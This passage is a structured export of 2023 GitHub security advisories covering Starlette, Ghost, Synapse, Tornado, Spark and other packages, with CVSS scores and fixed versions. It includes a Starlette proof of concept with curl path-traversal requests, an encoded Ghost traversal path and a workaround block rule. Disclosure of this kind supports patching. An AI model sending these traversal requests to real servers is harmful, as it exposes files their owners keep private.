1.4.0,GHSA-v5gw-mw7f-84px,2023-06-12T16:47:36Z,2023-05-17T03:49:14Z,,['CVE-2023-29159'],Starlette has Path Traversal vulnerability in StaticFiles,"### Summary When using `StaticFiles`, if there's a file or directory that starts with the same name as the `StaticFiles` directory, that file or directory is also exposed via `StaticFiles` which is a path traversal vulnerability. ### Details The root cause of this issue is the usage of `os.path.commonprefix()`: https://github.com/encode/starlette/blob/4bab981d9e870f6cee1bd4cd59b87ddaf355b2dc/starlette/staticfiles.py#L172-L174 As stated in the Python documentation (https://docs.python.org/3/library/os.path.html#os.path.commonprefix) this function returns the longest prefix common to paths. When passing a path like `/static/../static1.txt`, `os.path.commonprefix([full_path, directory])` returns `./static` which is the common part of `./static1.txt` and `./static`, It refers to `/static/../static1.txt` because it is considered in the staticfiles directory. As a result, it becomes possible to view files that should not be open to the public. The solution is to use `os.path.commonpath` as the Python documentation explains that `os.path.commonprefix` works a character at a time, it does not treat the arguments as paths. ### PoC In order to reproduce the issue, you need to create the following structure: ``` ├── static │ ├── index.html ├── static_disallow │ ├── index.html └── static1.txt ``` And run the `Starlette` app with: ```py import uvicorn from starlette.applications import Starlette from starlette.routing import Mount from starlette.staticfiles import StaticFiles routes = [ Mount(""/static"", app=StaticFiles(directory=""static"", html=True), name=""static""), ] app = Starlette(routes=routes) if __name__ == ""__main__"": uvicorn.run(app, host=""0.0.0.0"", port=8000) ``` And running the commands: ```shell curl --path-as-is 'localhost:8000/static/../static_disallow/' curl --path-as-is 'localhost:8000/static/../static1.txt' ``` The `static1.txt` and the directory `static_disallow` are exposed. ### Impact Confidentiality is breached: An attacker may obtain files that should not be open to the public. ### Credits Security researcher **Masashi Yamane of LAC Co., Ltd** reported this vulnerability to **JPCERT/CC Vulnerability Coordination Group** and they contacted us to coordinate a patch for the security issue. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'starlette'}, 'ecosystem_specific': {'affected_functions': ['starlette.staticfiles.StaticFiles.lookup_path']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.13.5'}, {'fixed': '0.27.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/encode/starlette/security/advisories/GHSA-v5gw-mw7f-84px'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-29159'}, {'type': 'WEB', 'url': 'https://github.com/encode/starlette/commit/1797de464124b090f10cf570441e8292936d63e3'}, {'type': 'PACKAGE', 'url': 'https://github.com/encode/starlette'}, {'type': 'WEB', 'url': 'https://github.com/encode/starlette/blob/4bab981d9e870f6cee1bd4cd59b87ddaf355b2dc/starlette/staticfiles.py#L172-L174'}, {'type': 'WEB', 'url': 'https://github.com/encode/starlette/releases/tag/0.27.0'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/starlette/PYSEC-2023-83.yaml'}, {'type': 'WEB', 'url': 'https://jvn.jp/en/jp/JVN95981715/'}]","{'cwe_ids': ['CWE-22'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-05-17T03:49:14Z', 'nvd_published_at': None}" 1.4.0,GHSA-wf7x-fh6w-34r6,2023-05-11T20:55:34Z,2023-05-05T06:30:32Z,,['CVE-2023-32235'],Path Traversal in Ghost,Ghost before 5.42.1 allows remote attackers to read arbitrary files within the active theme's folder via /assets/built%2F..%2F..%2F/ directory traversal. This occurs in frontend/web/middleware/static-theme.js.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'ghost'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.42.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32235'}, {'type': 'WEB', 'url': 'https://github.com/TryGhost/Ghost/commit/378dd913aa8d0fd0da29b0ffced8884579598b0f'}, {'type': 'PACKAGE', 'url': 'https://github.com/TryGhost/Ghost'}, {'type': 'WEB', 'url': 'https://github.com/TryGhost/Ghost/compare/v5.42.0...v5.42.1'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-05T22:37:11Z', 'nvd_published_at': None}" 1.4.0,GHSA-r97q-ghch-82j9,2023-05-03T21:57:10Z,2023-05-03T21:57:10Z,,['CVE-2023-31133'],Ghost vulnerable to information disclosure of private API fields,"### Impact Due to a lack of validation when filtering on the public API endpoints, it is possible to reveal private fields via a brute force attack. Ghost(Pro) has already been patched. We can find no evidence that the issue was exploited on Ghost(Pro) prior to the patch being added. Self-hosters are impacted if running Ghost a version below v5.46.1. Immediate action should be taken to secure your site - see patches and workarounds below. ### Patches v5.46.1 contains a fix for this issue. ### Workarounds Add a block for requests to `/ghost/api/content/*` where the `filter` query parameter contains `password` or `email`. ### For more information If you have any questions or comments about this advisory: * Email us at [security@ghost.org](mailto:security@ghost.org)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'ghost'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.46.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/TryGhost/Ghost/security/advisories/GHSA-r97q-ghch-82j9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-31133'}, {'type': 'WEB', 'url': 'https://github.com/TryGhost/Ghost/commit/b3caf16005289cc9909488391b4a26f3f4a66a90'}, {'type': 'PACKAGE', 'url': 'https://github.com/TryGhost/Ghost'}, {'type': 'WEB', 'url': 'https://github.com/TryGhost/Ghost/releases/tag/v5.46.1'}]","{'cwe_ids': ['CWE-200'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-03T21:57:10Z', 'nvd_published_at': None}" 1.4.0,GHSA-f3wc-3vxv-xmvr,2023-05-24T17:28:26Z,2023-05-24T17:28:26Z,,['CVE-2023-32323'],Synapse Outgoing federation to specific hosts can be disabled by sending malicious invites,"### Impact A malicious user on a Synapse homeserver X with permission to create certain state events can disable outbound federation from X to an arbitrary homeserver Y. Synapse instances with federation disabled are not affected. #### Details The Matrix protocol allows homeservers to provide an `invite_room_state` field on a [room invite](https://spec.matrix.org/v1.5/client-server-api/#mroommember) containing a [summary of room state](https://spec.matrix.org/v1.5/client-server-api/#stripped-state). In versions of Synapse up to and including v1.73.0, Synapse did not limit the size of `invite_room_state`, meaning that it was possible to create an arbitrarily large invite event. An attacker with an account on a vulnerable Synapse homeserver X could exploit this by having X create an over-sized invite event in a room with a user from another homeserver Y. Once acknowledged by the invitee's homeserver, the invite event would be sent in a batch of events to Y. If the malicious invite is so large that the entire batch is rejected as too large, X's outgoing traffic to Y would become ""stuck"", meaning that messages and state events created by X would remain unseen by Y. ### Patches Synapse 1.74 refuses to create oversized `invite_room_state` fields. Server operators should upgrade to Synapse 1.74 or newer urgently. ### Workarounds There are no robust workarounds. This attack needs an account on Synapse homeserver X to deny federation from X to another homeserver Y. As a partial mitigation, Synapse operators can disable open registration to limit the ability of attackers to create new accounts on homeserver X. If homeserver X has been attacked in this way, restarting it will resume outgoing federation by entering ""catchup mode"". For catchup mode to ignore the oversized invites, every attacked room must have a correctly-sized event sent by X which is newer than any oversized invite. This is difficult to arrange, and does not prevent the attacker from repeating their attack. ### References - https://github.com/matrix-org/synapse/issues/14492 was caused by this issue. - https://github.com/matrix-org/synapse/issues/14642 includes the patch described above. ### For more information If you have any questions or comments about this advisory, e-mail us at [security@matrix.org](mailto:security@matrix.org).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'matrix-synapse'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.74.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/security/advisories/GHSA-f3wc-3vxv-xmvr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32323'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/issues/14492'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/pull/14642'}, {'type': 'PACKAGE', 'url': 'https://github.com/matrix-org/synapse'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/matrix-synapse/PYSEC-2023-67.yaml'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UJIJRP5ZH6B3KGFLHCAKR2IX2Y4Z25QD/'}]","{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-24T17:28:26Z', 'nvd_published_at': None}" 1.4.0,GHSA-6vcf-cfjp-qxcw,2023-05-22T21:30:24Z,2023-05-12T12:30:18Z,,['CVE-2023-27238'],LavaLite vulnerable to web cache poisoning ,LavaLite CMS v 9.0.0 was discovered to be vulnerable to web cache poisoning.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'lavalite/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '9.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-27238'}, {'type': 'PACKAGE', 'url': 'https://github.com/LavaLite/cms'}, {'type': 'WEB', 'url': 'https://github.com/LavaLite/cms/blob/c0a36dd748c8f7ff53eb16eb572bdeebe72eb420/app/Http/Controllers/ResourceController.php#L8'}, {'type': 'WEB', 'url': 'https://github.com/M19O/Security-Advisories/tree/main/CVE-2023-27238'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-05-12T15:21:06Z', 'nvd_published_at': None}" 1.4.0,GHSA-mphm-gqh9-q59x,2023-05-09T18:48:39Z,2023-05-04T03:30:22Z,,['CVE-2023-27075'],Stored cross site scripting in Microbin,A cross-site scripting vulnerability (XSS) in the component microbin/src/pasta.rs of Microbin v1.2.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'microbin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-27075'}, {'type': 'WEB', 'url': 'https://github.com/szabodanika/microbin/issues/142'}, {'type': 'WEB', 'url': 'https://github.com/szabodanika/microbin/pull/143'}, {'type': 'WEB', 'url': 'https://github.com/szabodanika/microbin/pull/143/commits/6907bb4f13faf13e45d4a2cd0f9a8c562086e6ca'}, {'type': 'PACKAGE', 'url': 'https://github.com/szabodanika/microbin'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-05T02:22:40Z', 'nvd_published_at': None}" 1.4.0,GHSA-pvrc-wvj2-f59p,2023-05-26T22:00:39Z,2023-05-26T22:00:39Z,,['CVE-2023-33189'],Pomerium vulnerable to Incorrect Authorization with specially crafted requests,"### Impact With specially crafted requests, incorrect authorization decisions may be made by Pomerium. ### Patches We are releasing patch fixes to address this vulnerability going back to `v0.17.X`. Please upgrade to: - v0.22.2 - v0.21.4 - v0.20.1 - v0.19.2 - v0.18.1 - v0.17.4 ### For more information If you have any questions or comments about this advisory: - Open an issue in [pomerium/pomerium](https://github.com/pomerium/pomerium/issues) - Email us at [security@pomerium.com](mailto:security@pomerium.com) ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/pomerium/pomerium'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.22.0'}, {'fixed': '0.22.2'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/pomerium/pomerium'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.21.0'}, {'fixed': '0.21.4'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/pomerium/pomerium'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.20.0'}, {'fixed': '0.20.1'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/pomerium/pomerium'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.19.0'}, {'fixed': '0.19.2'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/pomerium/pomerium'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.18.0'}, {'fixed': '0.18.1'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/pomerium/pomerium'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.17.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pomerium/pomerium/security/advisories/GHSA-pvrc-wvj2-f59p'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33189'}, {'type': 'WEB', 'url': 'https://github.com/pomerium/pomerium/commit/d315e683357a9b587ba9ef399a8813bcc52fdebb'}, {'type': 'PACKAGE', 'url': 'https://github.com/pomerium/pomerium'}, {'type': 'WEB', 'url': 'https://github.com/pomerium/pomerium/releases/tag/v0.17.4'}, {'type': 'WEB', 'url': 'https://github.com/pomerium/pomerium/releases/tag/v0.18.1'}, {'type': 'WEB', 'url': 'https://github.com/pomerium/pomerium/releases/tag/v0.19.2'}, {'type': 'WEB', 'url': 'https://github.com/pomerium/pomerium/releases/tag/v0.20.1'}, {'type': 'WEB', 'url': 'https://github.com/pomerium/pomerium/releases/tag/v0.21.4'}, {'type': 'WEB', 'url': 'https://github.com/pomerium/pomerium/releases/tag/v0.22.2'}]","{'cwe_ids': ['CWE-285'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-05-26T22:00:39Z', 'nvd_published_at': None}" 1.4.0,GHSA-hj3f-6gcp-jg8j,2023-05-26T21:16:59Z,2023-05-25T12:30:16Z,,['CVE-2023-28370'],Open redirect in Tornado,Open redirect vulnerability in Tornado versions 6.3.1 and earlier allows a remote unauthenticated attacker to redirect a user to an arbitrary web site and conduct a phishing attack by having user access a specially crafted URL.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tornado'}, 'ecosystem_specific': {'affected_functions': ['tornado.web.StaticFileHandler.validate_absolute_path']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.3.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28370'}, {'type': 'WEB', 'url': 'https://github.com/tornadoweb/tornado/commit/32ad07c54e607839273b4e1819c347f5c8976b2f'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/tornado/PYSEC-2023-75.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/tornadoweb/tornado'}, {'type': 'WEB', 'url': 'https://github.com/tornadoweb/tornado/releases/tag/v6.3.2'}, {'type': 'WEB', 'url': 'https://jvn.jp/en/jp/JVN45127776/'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-25T17:00:25Z', 'nvd_published_at': None}" 1.4.0,GHSA-j5fj-rfh6-qj85,2023-05-26T19:10:03Z,2023-05-12T20:55:36Z,,['CVE-2023-32303'],Planet's secret file is created with excessive permissions,"### Impact The secret file stores the user's Planet API authentication information. It should only be accessible by the user, but its permissions allowed the user's group and non-group to read the file as well. ### Validation Check the permissions on the secret file with `ls -l ~/.planet.json` and ensure that they read as `-rw-------` ### Patches [d71415a8](https://github.com/planetlabs/planet-client-python/commit/d71415a83119c5e89d7b80d5f940d162376ee3b7) ### Workarounds Set the secret file permissions to only user read/write by hand: ``` chmod 600 ~/.planet.json ``` ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'planet'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/planetlabs/planet-client-python/security/advisories/GHSA-j5fj-rfh6-qj85'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32303'}, {'type': 'WEB', 'url': 'https://github.com/planetlabs/planet-client-python/commit/d71415a83119c5e89d7b80d5f940d162376ee3b7'}, {'type': 'PACKAGE', 'url': 'https://github.com/planetlabs/planet-client-python'}, {'type': 'WEB', 'url': 'https://github.com/planetlabs/planet-client-python/releases/tag/2.0.1'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/planet/PYSEC-2023-71.yaml'}]","{'cwe_ids': ['CWE-732'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-12T20:55:36Z', 'nvd_published_at': None}" 1.4.0,GHSA-847g-34c5-vvm8,2023-05-09T16:51:21Z,2023-05-01T18:30:23Z,,['CVE-2023-29641'],editor.md vulnerable to Cross-site Scripting,Cross Site Scripting (XSS) vulnerability in pandao editor.md thru 1.5.0 allows attackers to inject arbitrary web script or HTML via crafted markdown text.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'editor.md'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.5.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-29641'}, {'type': 'WEB', 'url': 'https://github.com/pandao/editor.md/issues/985'}, {'type': 'PACKAGE', 'url': 'https://github.com/pandao/editor.md'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-01T22:32:24Z', 'nvd_published_at': None}" 1.4.0,GHSA-59hw-j9g6-mfg3,2023-05-02T16:51:05Z,2023-05-02T09:30:17Z,,['CVE-2023-32007'],Apache Spark UI vulnerable to Command Injection,"The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input, and execute it. This will result in arbitrary shell command execution as the user Spark is currently running as. This issue was disclosed earlier as CVE-2022-33891, but incorrectly claimed version 3.1.3 (which has since gone EOL) would not be affected. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. Users are recommended to upgrade to a supported version of Apache Spark, such as version 3.4.0. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.spark:spark-parent_2.12'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.1.1'}, {'fixed': '3.2.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'pyspark'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.1.1'}, {'fixed': '3.2.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32007'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/spark'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/pyspark/PYSEC-2023-72.yaml'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/poxgnxhhnzz735kr1wos366l5vdbb0nv'}, {'type': 'WEB', 'url': 'https://spark.apache.org/security.html'}, {'type': 'WEB', 'url': 'https://www.cve.org/CVERecord?id=CVE-2022-33891'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/05/02/1'}]","{'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-02T16:51:05Z', 'nvd_published_at': None}" 1.4.0,GHSA-ccw9-q5h2-8c2w,2023-06-19T17:01:31Z,2023-05-18T17:30:44Z,,['CVE-2022-24666'],swift-nio-http2 vulnerable to denial of service via invalid HTTP/2 HEADERS frame length,"A program using swift-nio-http2 is vulnerable to a denial of service attack, caused by a network peer sending a specially crafted HTTP/2 frame. This attack affects all swift-nio-http2 versions from 1.0.0 to 1.19.1. It is fixed in 1.19.2 and later releases. This vulnerability is caused by a logical error when parsing a HTTP/2 HEADERS frame where the frame contains priority information without any other data. This logical error caused confusion about the size of the frame, leading to a parsing error. This parsing error immediately crashes the entire process. Sending a HEADERS frame with HTTP/2 priority information does not require any special permission, so any HTTP/2 connection peer may send such a frame. For clients, this means any server to which they connect may launch this attack. For servers, anyone they allow to connect to them may launch such an attack. The attack is low-effort: it takes very little resources to send an appropriately crafted frame. The impact on availability is high: receiving the frame immediately crashes the server, dropping all in-flight connections and causing the service to need to restart. It is straightforward for an attacker to repeatedly send appropriately crafted frames, so attackers require very few resources to achieve a substantial denial of service. The attack does not have any confidentiality or integrity risks in and of itself: swift-nio-http2 is parsing the frame in memory-safe code, so the crash is safe. However, sudden process crashes can lead to violations of invariants in services, so it is possible that this attack can be used to trigger an error condition that has confidentiality or integrity risks. The risk can be mitigated if untrusted peers can be prevented from communicating with the service. This mitigation is not available to many services. The issue is fixed by rewriting the parsing code to correctly handle the condition. The issue was found by automated fuzzing by oss-fuzz.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'purl-type:swift', 'name': 'github.com/apple/swift-nio-http2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.19.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/apple/swift-nio-http2/security/advisories/GHSA-ccw9-q5h2-8c2w'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-24666'}, {'type': 'WEB', 'url': 'https://github.com/apple/swift-nio-http2/commit/93215774aa7d223a5ad5aa0b80453375d669fa8f'}, {'type': 'PACKAGE', 'url': 'https://github.com/apple/swift-nio-http2'}, {'type': 'WEB', 'url': 'https://github.com/apple/swift-nio-http2/releases/tag/1.19.2'}]","{'cwe_ids': ['CWE-130'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-18T17:30:44Z', 'nvd_published_at': None}" 1.4.0,GHSA-9x7h-ggc3-xg47,2023-05-17T12:57:59Z,2023-05-08T15:30:20Z,,['CVE-2023-30019'],imgproxy is vulnerable to Server-Side Request Forgery,imgproxy prior to version 3.15.0 is vulnerable to Server-Side Request Forgery (SSRF) due to a lack of sanitization of the imageURL parameter.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/imgproxy/imgproxy/v3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.15.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-30019'}, {'type': 'WEB', 'url': 'https://github.com/imgproxy/imgproxy/commit/1a9768a2c682e88820064aa3d9a05ea234ff3cc4'}, {'type': 'WEB', 'url': 'https://breakandpray.com/cve-2023-30019-ssrf-in-imgproxy/'}, {'type': 'PACKAGE', 'url': 'https://github.com/imgproxy/imgproxy'}, {'type': 'WEB', 'url': 'https://github.com/imgproxy/imgproxy/blob/ee9e8f0cb101ec22318caffd552a23cc0548d5ce/imagedata/download.go#L142'}]","{'cwe_ids': ['CWE-918'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-11T20:34:50Z', 'nvd_published_at': None}" 1.4.0,GHSA-2q89-485c-9j2x,2023-05-24T18:31:42Z,2023-05-11T20:40:54Z,,['CVE-2023-1732'],Improper random reading in CIRCL,"### Impact When sampling randomness for a shared secret, the implementation of Kyber and FrodoKEM, did not check whether `crypto/rand.Read()` returns an error. In rare deployment cases (error thrown by the `Read()` function), this could lead to a predictable shared secret. The tkn20 and blindrsa components did not check whether enough randomness was returned from the user provided randomness source. Typically the user provides `crypto/rand.Reader`, which in the vast majority of cases will always return the right number random bytes. In the cases where it does not, or the user provides a source that does not, the blinding for blindrsa is weak and integrity of the plaintext is not ensured in tkn20. ### Patches The fix was introduced in CIRCL v. 1.3.3 ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/cloudflare/circl'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/cloudflare/circl/security/advisories/GHSA-2q89-485c-9j2x'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1732'}, {'type': 'WEB', 'url': 'https://github.com/cloudflare/circl/commit/ff8d91225f8954b4970b6d6382d2e4c78f4a4cf8'}, {'type': 'PACKAGE', 'url': 'https://github.com/cloudflare/circl'}, {'type': 'WEB', 'url': 'https://github.com/cloudflare/circl/releases/tag/v1.3.3'}]","{'cwe_ids': ['CWE-20', 'CWE-755'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-11T20:40:54Z', 'nvd_published_at': None}" 1.4.0,GHSA-w88f-j9rc-h7v3,2023-06-01T04:14:20Z,2023-05-16T18:30:16Z,,['CVE-2023-32996'],Jenkins SAML Single Sign On(SSO) Plugin missing permission checks,"Jenkins SAML Single Sign On(SSO) Plugin 2.0.0 and earlier does not perform a permission check in an HTTP endpoint. This allows attackers with Overall/Read permission to send an HTTP POST request with JSON body containing attacker-specified content, to miniOrange’s API for sending emails. Additionally, this HTTP endpoint does not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability. SAML Single Sign On(SSO) Plugin 2.0.1 removes the affected HTTP endpoint.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.jenkins.plugins:miniorange-saml-sp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32996'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-05-16/#SECURITY-2994'}]","{'cwe_ids': ['CWE-276'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-17T03:36:15Z', 'nvd_published_at': None}" 1.4.0,GHSA-3vp4-m3rf-835h,2023-05-11T14:03:52Z,2023-05-04T06:30:12Z,,['CVE-2023-26125'],Improper input validation in github.com/gin-gonic/gin,"Versions of the package github.com/gin-gonic/gin before version 1.9.0 are vulnerable to Improper Input Validation by allowing an attacker to use a specially crafted request via the X-Forwarded-Prefix header, potentially leading to cache poisoning. **Note:** Although this issue does not pose a significant threat on its own it can serve as an input vector for other more impactful vulnerabilities. However, successful exploitation may depend on the server configuration and whether the header is used in the application logic.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/gin-gonic/gin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26125'}, {'type': 'WEB', 'url': 'https://github.com/gin-gonic/gin/pull/3500'}, {'type': 'WEB', 'url': 'https://github.com/gin-gonic/gin/pull/3503'}, {'type': 'WEB', 'url': 'https://github.com/t0rchwo0d/gin/commit/fd9f98e70fb4107ee68c783482d231d35e60507b'}, {'type': 'PACKAGE', 'url': 'https://github.com/gin-gonic/gin'}, {'type': 'WEB', 'url': 'https://github.com/gin-gonic/gin/releases/tag/v1.9.0'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGINGONICGIN-3324285'}]","{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-05T02:20:00Z', 'nvd_published_at': None}" 1.4.0,GHSA-r3xc-prgr-mg9p,2023-05-15T21:42:53Z,2023-05-07T03:30:17Z,,['CVE-2023-31047'],Django 